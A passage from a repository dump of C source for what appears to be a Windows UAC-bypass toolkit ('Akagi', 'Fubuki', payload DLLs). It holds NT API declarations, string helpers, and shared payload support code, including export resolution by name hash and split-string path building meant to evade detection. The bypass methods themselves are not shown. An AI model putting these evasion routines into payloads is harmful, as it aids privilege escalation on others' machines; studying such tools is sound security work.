*PACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA {\n    PVOID Information;\n    PVOID SectionBase;\n    ULONG SectionLength;\n    PVOID SectionGlobalDataBase;\n    ULONG SectionGlobalDataLength;\n} ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA, *PACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA;\n\ntypedef struct _ACTIVATION_CONTEXT_SECTION_KEYED_DATA {\n    ULONG Size;\n    ULONG DataFormatVersion;\n    PVOID Data;\n    ULONG Length;\n    PVOID SectionGlobalData;\n    ULONG SectionGlobalDataLength;\n    PVOID SectionBase;\n    ULONG SectionTotalLength;\n    PACTIVATION_CONTEXT ActivationContext;\n    ULONG AssemblyRosterIndex;\n    ULONG Flags;\n    ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA AssemblyMetadata;\n} ACTIVATION_CONTEXT_SECTION_KEYED_DATA, *PACTIVATION_CONTEXT_SECTION_KEYED_DATA;\n\n#define RTL_ACTIVATE_ACTIVATION_CONTEXT_EX_FLAG_RELEASE_ON_STACK_DEALLOCATION 
(0x00000001)\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlActivateActivationContextEx(\n    _In_ ULONG Flags,\n    _In_ PTEB Teb,\n    _In_ PACTIVATION_CONTEXT ActivationContext,\n    _Out_ PULONG_PTR Cookie);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlQueryInformationActivationContext(\n    _In_ ULONG Flags,\n    _In_ PCACTIVATION_CONTEXT ActivationContext,\n    _In_opt_ PVOID SubInstanceIndex,\n    _In_ ACTIVATION_CONTEXT_INFO_CLASS ActivationContextInformationClass,\n    _Out_ PVOID ActivationContextInformation,\n    _In_ SIZE_T ActivationContextInformationLength,\n    _Out_opt_ PSIZE_T ReturnLength);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlQueryInformationActiveActivationContext(\n    _In_ ACTIVATION_CONTEXT_INFO_CLASS ActivationContextInformationClass,\n    _Out_ PVOID ActivationContextInformation,\n    _In_ SIZE_T ActivationContextInformationLength,\n    _Out_opt_ PSIZE_T ReturnLength);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlAllocateActivationContextStack(\n    _Inout_ PACTIVATION_CONTEXT_STACK *ActivationContextStackPointer);\n\nNTSYSAPI\nVOID \nNTAPI \nRtlFreeActivationContextStack(\n    _In_ PACTIVATION_CONTEXT_STACK ActivationContextStackPointer);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlCreateActivationContext(\n    _In_ ULONG Flags,\n    _In_ const PACTIVATION_CONTEXT_DATA ActivationContextData,\n    _In_opt_ ULONG ExtraBytes,\n    _In_opt_ PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine,\n    _In_opt_ PVOID NotificationContext,\n    _Out_ PACTIVATION_CONTEXT *ActivationContext);\n\nNTSYSAPI\nVOID \nNTAPI \nRtlAddRefActivationContext(\n    _In_ PACTIVATION_CONTEXT AppCtx);\n\nNTSYSAPI\nVOID \nNTAPI \nRtlReleaseActivationContext(\n    _In_ PACTIVATION_CONTEXT AppCtx);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlZombifyActivationContext(\n    _In_ PACTIVATION_CONTEXT ActivationContext);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlGetActiveActivationContext(\n    _Out_ PACTIVATION_CONTEXT *ActivationContext);\n\nNTSYSAPI\nBOOLEAN \nNTAPI \nRtlIsActivationContextActive(\n    _In_ PACTIVATION_CONTEXT 
ActivationContext);\n\nNTSYSAPI\nNTSTATUS\nNTAPI \nRtlQueryActivationContextApplicationSettings(\n    _In_opt_      DWORD dwFlags,\n    _In_opt_      HANDLE hActCtx,\n    _In_opt_      PCWSTR settingsNameSpace,\n    _In_          PCWSTR settingName,\n    _Out_writes_bytes_to_opt_(dwBuffer, *pdwWrittenOrRequired) PWSTR pvBuffer,\n    _In_      SIZE_T dwBuffer,\n    _Out_opt_ SIZE_T *pdwWrittenOrRequired);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlFindActivationContextSectionString(\n    _In_        ULONG Flags,\n    _In_opt_    CONST GUID *ExtensionGuid,\n    _In_        ULONG SectionId,\n    _In_        PCUNICODE_STRING StringToFind,\n    _Inout_     PACTIVATION_CONTEXT_SECTION_KEYED_DATA ReturnedData);\n\n//\n// NTSXS_RTL HEADER END\n//\n\n#pragma warning(pop)\n\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif // NTSXS_RTL\n"
  },
  {
    "path": "Source/Shared/rtltypes.h",
    "content": "#pragma once\n\n#ifndef _WCHAR_T_DEFINED\ntypedef unsigned short wchar_t;\n#define _WCHAR_T_DEFINED\n#endif  /* _WCHAR_T_DEFINED */\n\n#ifndef _SIZE_T_DEFINED\n#ifdef _WIN64\ntypedef unsigned __int64    size_t;\n#else  /* _WIN64 */\ntypedef __w64 unsigned int   size_t;\n#endif  /* _WIN64 */\n#define _SIZE_T_DEFINED\n#endif  /* _SIZE_T_DEFINED */\n\n__forceinline char locase_a(char c)\n{\n\tif ((c >= 'A') && (c <= 'Z'))\n\t\treturn c + 0x20;\n\telse\n\t\treturn c;\n}\n\n__forceinline wchar_t locase_w(wchar_t c)\n{\n\tif ((c >= 'A') && (c <= 'Z'))\n\t\treturn c + 0x20;\n\telse\n\t\treturn c;\n}\n\n__forceinline char byteabs(char x) {\n\tif (x < 0)\n\t\treturn -x;\n\treturn x;\n}\n\n__forceinline int _isdigit_a(char x) {\n\treturn ((x >= '0') && (x <= '9'));\n}\n\n__forceinline int _isdigit_w(wchar_t x) {\n\treturn ((x >= L'0') && (x <= L'9'));\n}\n"
  },
  {
    "path": "Source/Shared/shared.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018 - 2021\n*\n*  TITLE:       SHARED.H\n*\n*  VERSION:     3.56\n*\n*  DATE:        26 July 2021\n*\n*  Shared include header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n//disable nonmeaningful warnings.\n#pragma warning(push)\n#pragma warning(disable: 4005) // macro redefinition\n#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n\n#include <Windows.h>\n#include <ntstatus.h>\n#include \"ntos\\ntos.h\"\n#include \"ntos\\ntbuilds.h\"\n\n#define _NTDEF_\n#include <ntsecapi.h>\n#undef _NTDEF_\n\n#include \"minirtl.h\"\n#include \"_filename.h\"\n#include \"util.h\"\n#include \"windefend.h\"\n#include \"consts.h\"\n\n#if defined(__cplusplus)\n#include <malloc.h>\n#endif\n\n#pragma warning(pop)\n"
  },
  {
    "path": "Source/Shared/strtoi.c",
    "content": "#include \"rtltypes.h\"\n\nint strtoi_a(char *s)\n{\n\tint\t\ta = 0, sign;\n\tchar\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase '-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase '+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_a(c))\n\t\t\ta = (a*10) + (c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n\nint strtoi_w(wchar_t *s)\n{\n\tint\t\t\ta = 0, sign;\n\twchar_t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase L'-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase L'+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n"
  },
  {
    "path": "Source/Shared/strtoul.c",
    "content": "#include \"rtltypes.h\"\n\nunsigned long strtoul_a(char *s)\n{\n\tunsigned long\ta = 0;\n\tchar\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_a(c))\n\t\t\ta = (a*10)+(c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a;\n}\n\nunsigned long strtoul_w(wchar_t *s)\n{\n\tunsigned long\ta = 0;\n\twchar_t\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a;\n}\n"
  },
  {
    "path": "Source/Shared/u64tohex.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t u64tohex_a(unsigned long long x, char *s)\n{\n\tchar\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 16;\n\n\tfor (c=0; c<16; c++) {\n\t\tp = (char)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += '0';\n\t\telse\n\t\t\tp = 'A' + (p-10);\n\n\t\ts[15-c] = p;\n\t}\n\n\ts[16] = 0;\n\treturn 16;\n}\n\nsize_t u64tohex_w(unsigned long long x, wchar_t *s)\n{\n\twchar_t\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 16;\n\n\tfor (c = 0; c<16; c++) {\n\t\tp = (wchar_t)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += L'0';\n\t\telse\n\t\t\tp = L'A' + (p-10);\n\n\t\ts[15-c] = p;\n\t}\n\n\ts[16] = 0;\n\treturn 16;\n}\n"
  },
  {
    "path": "Source/Shared/u64tostr.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t u64tostr_a(unsigned long long x, char *s)\n{\n\tunsigned long long\tt = x;\n\tsize_t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (char)(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r;\n}\n\nsize_t u64tostr_w(unsigned long long x, wchar_t *s)\n{\n\tunsigned long long\tt = x;\n\tsize_t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r;\n}\n"
  },
  {
    "path": "Source/Shared/ultohex.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t ultohex_a(unsigned long x, char *s)\n{\n\tchar\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 8;\n\n\tfor (c=0; c<8; c++) {\n\t\tp = (char)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += '0';\n\t\telse\n\t\t\tp = 'A' + (p-10);\n\n\t\ts[7-c] = p;\n\t}\n\n\ts[8] = 0;\n\treturn 8;\n}\n\nsize_t ultohex_w(unsigned long x, wchar_t *s)\n{\n\twchar_t\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 8;\n\n\tfor (c=0; c<8; c++) {\n\t\tp = (wchar_t)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += L'0';\n\t\telse\n\t\t\tp = L'A' + (p-10);\n\n\t\ts[7-c] = p;\n\t}\n\n\ts[8] = 0;\n\treturn 8;\n}\n"
  },
  {
    "path": "Source/Shared/ultostr.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t ultostr_a(unsigned long x, char *s)\n{\n\tunsigned long\tt=x;\n\tsize_t\t\t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (char)(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r;\n}\n\nsize_t ultostr_w(unsigned long x, wchar_t *s)\n{\n\tunsigned long\tt=x;\n\tsize_t\t\t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r;\n}\n"
  },
  {
    "path": "Source/Shared/util.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n*  TITLE:       UTIL.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  Global support routines file shared between payload dlls.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#undef _TRACE_CALL\n\n#include \"shared.h\"\n\n/*\n* ucmxHeapAlloc\n*\n* Purpose:\n*\n* Wrapper for RtlAllocateHeap.\n*\n*/\nPVOID ucmxHeapAlloc(\n    _In_ SIZE_T NumberOfBytes\n)\n{\n    return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap,\n        HEAP_ZERO_MEMORY,\n        NumberOfBytes);\n}\n\n/*\n* ucmxHeapFree\n*\n* Purpose:\n*\n* Wrapper for RtlFreeHeap.\n*\n*/\nBOOLEAN ucmxHeapFree(\n    _In_ PVOID BaseAddress\n)\n{\n    return RtlFreeHeap(NtCurrentPeb()->ProcessHeap,\n        0,\n        BaseAddress);\n}\n\n/*\n* ucmIsProcess32bit\n*\n* Purpose:\n*\n* Return TRUE if given process is under WOW64, FALSE otherwise.\n*\n*/\nBOOLEAN ucmIsProcess32bit(\n    _In_ HANDLE hProcess\n)\n{\n    NTSTATUS status;\n    PROCESS_EXTENDED_BASIC_INFORMATION pebi;\n\n    if (hProcess == NULL) {\n        return FALSE;\n    }\n\n    //query if this is wow64 process\n    RtlSecureZeroMemory(&pebi, sizeof(pebi));\n    pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);\n    status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);\n    if (NT_SUCCESS(status)) {\n        return (pebi.IsWow64Process == 1);\n    }\n    return FALSE;\n}\n\n/*\n* ucmxQuerySystemDirectory\n*\n* Purpose:\n*\n* Query system directory full path including slash (with wow64 support).\n*\n*/\nVOID ucmxQuerySystemDirectory(\n    _Inout_ LPWSTR lpSystemDirectory,\n    
_In_ BOOLEAN CheckWow64)\n{\n    WCHAR szSystem32Prep[] = { L'\\\\', L's', L'y', L's', 0 };\n    WCHAR szSystem32Final[] = { L't', L'e', L'm', L'3', L'2', L'\\\\', 0 };\n    WCHAR szWow64Final[] = { L'w', L'o', L'w', L'6', L'4', L'\\\\', 0 };\n\n    _strcpy(lpSystemDirectory, USER_SHARED_DATA->NtSystemRoot);\n    _strcat(lpSystemDirectory, szSystem32Prep);\n\n    if (CheckWow64) {\n        if (ucmIsProcess32bit(NtCurrentProcess())) {\n            _strcat(lpSystemDirectory, szWow64Final);\n        }\n        else {\n            _strcat(lpSystemDirectory, szSystem32Final);\n        }\n    }\n    else {\n        _strcat(lpSystemDirectory, szSystem32Final);\n    }\n}\n\n/*\n* ucmBinTextEncode\n*\n* Purpose:\n*\n* Create pseudo random string from UI64 value.\n*\n*/\nVOID ucmBinTextEncode(\n    _In_ unsigned __int64 x,\n    _Inout_ wchar_t* s\n)\n{\n    char    tbl[64];\n    char    c = 0;\n    int     p;\n\n    tbl[62] = '-';\n    tbl[63] = '_';\n\n    for (c = 0; c < 26; ++c)\n    {\n        tbl[c] = 'A' + c;\n        tbl[26 + c] = 'a' + c;\n        if (c < 10)\n            tbl[52 + c] = '0' + c;\n    }\n\n    for (p = 0; p < 13; ++p)\n    {\n        c = x & 0x3f;\n        x >>= 5;\n        *s = (wchar_t)tbl[c];\n        ++s;\n    }\n\n    *s = 0;\n}\n\n/*\n* ucmGenerateSharedObjectName\n*\n* Purpose:\n*\n* Create pseudo random object name from its ID.\n*\n*/\nVOID ucmGenerateSharedObjectName(\n    _In_ WORD ObjectId,\n    _Inout_ LPWSTR lpBuffer\n)\n{\n    ULARGE_INTEGER value;\n\n    value.LowPart = MAKELONG(\n        MAKEWORD(UCM_VERSION_BUILD, UCM_VERSION_REVISION),\n        MAKEWORD(UCM_VERSION_MINOR, UCM_VERSION_MAJOR));\n\n    value.HighPart = MAKELONG(UACME_SHARED_BASE_ID, ObjectId);\n\n    ucmBinTextEncode(value.QuadPart, lpBuffer);\n}\n\n/*\n* ucmxCreateBoundaryDescriptorSID\n*\n* Purpose:\n*\n* Create special SID to access isolated namespace.\n*\n*/\nPSID ucmxCreateBoundaryDescriptorSID(\n    SID_IDENTIFIER_AUTHORITY* SidAuthority,\n    UCHAR 
SubAuthorityCount,\n    ULONG* SubAuthorities\n)\n{\n    ULONG i;\n    PSID  pSid;\n\n    pSid = ucmxHeapAlloc(RtlLengthRequiredSid(SubAuthorityCount));\n    if (pSid) {\n\n        if (NT_SUCCESS(RtlInitializeSid(pSid, SidAuthority, SubAuthorityCount))) {\n\n            for (i = 0; i < SubAuthorityCount; i++)\n                *RtlSubAuthoritySid(pSid, i) = SubAuthorities[i];\n\n            return pSid;\n\n        }\n        ucmxHeapFree(pSid);\n    }\n    return NULL;\n}\n\n/*\n* ucmOpenAkagiNamespace\n*\n* Purpose:\n*\n* Open Akagi private namespace.\n*\n* Use NtClose on returned handle.\n*\n*/\nHANDLE ucmOpenAkagiNamespace(\n    VOID\n)\n{\n    HANDLE hNamespace = NULL;\n    HANDLE  hBoundary = NULL;\n    PSID pWorldSid;\n    SID_IDENTIFIER_AUTHORITY SidWorldAuthority = SECURITY_WORLD_SID_AUTHORITY;\n\n    UNICODE_STRING usName;\n    OBJECT_ATTRIBUTES obja = RTL_INIT_OBJECT_ATTRIBUTES((PUNICODE_STRING)NULL, 0);\n\n    ULONG SubAuthoritiesWorld[] = { SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0 };\n    WCHAR szBoundaryDescriptorName[128];\n\n    RtlSecureZeroMemory(&szBoundaryDescriptorName, sizeof(szBoundaryDescriptorName));\n    ucmGenerateSharedObjectName((WORD)AKAGI_BDESCRIPTOR_NAME_ID, szBoundaryDescriptorName);\n    RtlInitUnicodeString(&usName, szBoundaryDescriptorName);\n\n    do {\n        //\n        // Create and assign boundary descriptor.\n        //\n        hBoundary = RtlCreateBoundaryDescriptor(&usName, 0);\n        if (hBoundary == NULL)\n            break;\n\n        pWorldSid = ucmxCreateBoundaryDescriptorSID(\n            &SidWorldAuthority,\n            1,\n            SubAuthoritiesWorld);\n\n        if (pWorldSid == NULL)\n            break;\n\n        if (!NT_SUCCESS(RtlAddSIDToBoundaryDescriptor(&hBoundary, pWorldSid))) {\n            RtlFreeSid(pWorldSid);\n            break;\n        }\n\n        if (!NT_SUCCESS(NtOpenPrivateNamespace(\n            &hNamespace,\n            MAXIMUM_ALLOWED,\n            &obja,\n            hBoundary)))\n     
   {\n            break;\n        }\n\n    } while (FALSE);\n\n    if (hBoundary) RtlDeleteBoundaryDescriptor(hBoundary);\n\n    return hNamespace;\n}\n\n/*\n* ucmReadSharedParameters\n*\n* Purpose:\n*\n* Read shared parameters from Akagi.\n*\n* Return TRUE on success, FALSE otherwise.\n*\n*/\n_Success_(return == TRUE)\nBOOL ucmReadSharedParameters(\n    _Out_ UACME_PARAM_BLOCK * SharedParameters\n)\n{\n    BOOL bResult = FALSE;\n    ULONG Crc32;\n    HANDLE hNamespace = NULL, hSection = NULL;\n    PVOID SectionBuffer = NULL;\n    SIZE_T ViewSize = PAGE_SIZE;\n\n    UNICODE_STRING usName;\n    OBJECT_ATTRIBUTES obja;\n\n    UACME_PARAM_BLOCK sharedParameters;\n    WCHAR szSectionName[128];\n\n    do {\n\n        hNamespace = ucmOpenAkagiNamespace();\n        if (hNamespace == NULL)\n            break;\n\n        RtlSecureZeroMemory(&szSectionName, sizeof(szSectionName));\n        ucmGenerateSharedObjectName((WORD)AKAGI_SHARED_SECTION_ID, szSectionName);\n        RtlInitUnicodeString(&usName, szSectionName);\n\n        InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, hNamespace, NULL);\n        if (NT_SUCCESS(NtOpenSection(&hSection, SECTION_ALL_ACCESS, &obja))) {\n            if (NT_SUCCESS(NtMapViewOfSection(\n                hSection,\n                NtCurrentProcess(),\n                &SectionBuffer,\n                0,\n                PAGE_SIZE,\n                NULL,\n                &ViewSize,\n                ViewUnmap,\n                MEM_TOP_DOWN,\n                PAGE_READONLY)))\n            {\n                RtlSecureZeroMemory(&sharedParameters, sizeof(UACME_PARAM_BLOCK));\n                RtlCopyMemory(&sharedParameters, SectionBuffer, sizeof(UACME_PARAM_BLOCK));\n                NtUnmapViewOfSection(NtCurrentProcess(), SectionBuffer);\n\n                //\n                // Validate data.\n                //\n                Crc32 = sharedParameters.Crc32;\n                sharedParameters.Crc32 = 0;\n                if (Crc32 == 
RtlComputeCrc32(0, &sharedParameters, sizeof(UACME_PARAM_BLOCK))) {\n                    sharedParameters.Crc32 = Crc32;\n                    RtlCopyMemory(SharedParameters, &sharedParameters, sizeof(UACME_PARAM_BLOCK));\n                    bResult = TRUE;\n                }\n            }\n            NtClose(hSection);\n        }\n        NtClose(hNamespace);\n\n    } while (FALSE);\n\n    return bResult;\n}\n\n/*\n* ucmSetCompletion\n*\n* Purpose:\n*\n* Notify Akagi about task completion.\n*\n*/\nVOID ucmSetCompletion(\n    _In_ LPWSTR lpEvent\n)\n{\n    HANDLE hEvent = NULL, hNamespace = NULL;\n    UNICODE_STRING usName;\n    OBJECT_ATTRIBUTES obja;\n\n    hNamespace = ucmOpenAkagiNamespace();\n    if (hNamespace) {\n\n        RtlInitUnicodeString(&usName, lpEvent);\n        InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, hNamespace, NULL);\n        if (NT_SUCCESS(NtOpenEvent(&hEvent, EVENT_ALL_ACCESS, &obja))) {\n            NtSetEvent(hEvent, NULL);\n            NtClose(hEvent);\n        }\n        NtClose(hNamespace);\n    }\n}\n\n/*\n* ucmPrivilegeEnabled\n*\n* Purpose:\n*\n* Tests if the given token has the given privilege enabled/enabled by default.\n*\n*/\nBOOLEAN ucmPrivilegeEnabled(\n    _In_ HANDLE hToken,\n    _In_ ULONG Privilege\n)\n{\n    NTSTATUS status;\n    PRIVILEGE_SET Privs;\n    BOOLEAN bResult = FALSE;\n\n    Privs.Control = PRIVILEGE_SET_ALL_NECESSARY;\n    Privs.PrivilegeCount = 1;\n    Privs.Privilege[0].Luid.LowPart = Privilege;\n    Privs.Privilege[0].Luid.HighPart = 0;\n    Privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n    status = NtPrivilegeCheck(hToken, &Privs, &bResult);\n    RtlSetLastWin32Error(RtlNtStatusToDosError(status));\n\n    return bResult;\n}\n\n/*\n* ucmFormatTimeOut\n*\n* Purpose:\n*\n* Translates a Win32 style timeout to an NT relative timeout.\n*\n*/\nPLARGE_INTEGER ucmFormatTimeOut(\n    _Out_ PLARGE_INTEGER TimeOut,\n    _In_ DWORD 
Milliseconds\n)\n{\n    if ((LONG)Milliseconds == -1) {\n        return(NULL);\n    }\n    TimeOut->QuadPart = UInt32x32To64(Milliseconds, 10000);\n    TimeOut->QuadPart *= -1;\n    return TimeOut;\n}\n\n/*\n* ucmSleep\n*\n* Purpose:\n*\n* Win32 Sleep replacement.\n*\n*/\nVOID ucmSleep(\n    _In_ DWORD Miliseconds\n)\n{\n    LARGE_INTEGER liDueTime;\n\n    if (Miliseconds == INFINITE) {\n        liDueTime.QuadPart = 0x8000000000000000;\n    }\n    else {\n        ucmFormatTimeOut(&liDueTime, Miliseconds);\n    }\n    NtDelayExecution(FALSE, &liDueTime);\n}\n\n/*\n* ucmCreateSyncMutant\n*\n* Purpose:\n*\n* Create sync mutex.\n*\n*/\nNTSTATUS ucmCreateSyncMutant(\n    _Out_ PHANDLE phMutant\n)\n{\n    UNICODE_STRING usName;\n    OBJECT_ATTRIBUTES obja;\n\n    WCHAR szObjectName[256];\n    WCHAR szName[128];\n\n    RtlSecureZeroMemory(&szName, sizeof(szName));\n    _strcpy(szObjectName, L\"\\\\BaseNamedObjects\\\\\");\n    ucmGenerateSharedObjectName(FUBUKI_SYNC_MUTEX_ID, szName);\n    _strcat(szObjectName, szName);\n\n    RtlInitUnicodeString(&usName, szObjectName);\n    InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n    return NtCreateMutant(phMutant, MUTANT_ALL_ACCESS, &obja, FALSE);\n}\n\n/*\n* ucmGetHashForString\n*\n* Purpose:\n*\n* Calculates specific hash for string.\n*\n*/\nDWORD ucmGetHashForString(\n    _In_ char* s\n)\n{\n    DWORD h = 0;\n\n    while (*s != 0) {\n        h ^= *s;\n        h = RotateLeft32(h, 3) + 1;\n        s++;\n    }\n\n    return h;\n}\n\n/*\n* ucmGetProcedureAddressByHash\n*\n* Purpose:\n*\n* Return pointer to function in dll from name hash value.\n*\n*/\nLPVOID ucmGetProcedureAddressByHash(\n    _In_ PVOID ImageBase,\n    _In_ DWORD ProcedureHash\n)\n{\n    DWORD i;\n    ULONG sz = 0;\n\n    IMAGE_DOS_HEADER* DosHeader;\n    IMAGE_EXPORT_DIRECTORY* Exports;\n    PDWORD Names, Functions;\n    PWORD Ordinals;\n\n    DWORD_PTR FunctionPtr;\n\n    DosHeader = (IMAGE_DOS_HEADER*)ImageBase;\n\n    Exports 
= (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase,\n        TRUE,\n        IMAGE_DIRECTORY_ENTRY_EXPORT,\n        &sz);\n\n    if (Exports == NULL)\n        return NULL;\n\n    Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);\n    Ordinals = (PWORD)((PBYTE)DosHeader + Exports->AddressOfNameOrdinals);\n    Functions = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfFunctions);\n\n    for (i = 0; i < Exports->NumberOfNames; i++) {\n        if (ucmGetHashForString((char*)((PBYTE)DosHeader + Names[i])) == ProcedureHash) {\n            FunctionPtr = Functions[Ordinals[i]];\n            return (PBYTE)ImageBase + FunctionPtr;\n        }\n    }\n\n    return NULL;\n}\n\n/*\n* ucmGetStartupInfo\n*\n* Purpose:\n*\n* Reimplemented GetStartupInfoW.\n*\n*/\nVOID ucmGetStartupInfo(\n    _In_ LPSTARTUPINFOW lpStartupInfo\n)\n{\n    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;\n\n    if (lpStartupInfo == NULL) {\n        return;\n    }\n\n    ProcessParameters = NtCurrentPeb()->ProcessParameters;\n\n    lpStartupInfo->cb = sizeof(*lpStartupInfo);\n    lpStartupInfo->lpReserved = (LPWSTR)ProcessParameters->ShellInfo.Buffer;\n    lpStartupInfo->lpDesktop = (LPWSTR)ProcessParameters->DesktopInfo.Buffer;\n    lpStartupInfo->lpTitle = (LPWSTR)ProcessParameters->WindowTitle.Buffer;\n    lpStartupInfo->dwX = ProcessParameters->StartingX;\n    lpStartupInfo->dwY = ProcessParameters->StartingY;\n    lpStartupInfo->dwXSize = ProcessParameters->CountX;\n    lpStartupInfo->dwYSize = ProcessParameters->CountY;\n    lpStartupInfo->dwXCountChars = ProcessParameters->CountCharsX;\n    lpStartupInfo->dwYCountChars = ProcessParameters->CountCharsY;\n    lpStartupInfo->dwFillAttribute = ProcessParameters->FillAttribute;\n    lpStartupInfo->dwFlags = ProcessParameters->WindowFlags;\n    lpStartupInfo->wShowWindow = (WORD)ProcessParameters->ShowWindowFlags;\n    lpStartupInfo->cbReserved2 = ProcessParameters->RuntimeData.Length;\n    lpStartupInfo->lpReserved2 = 
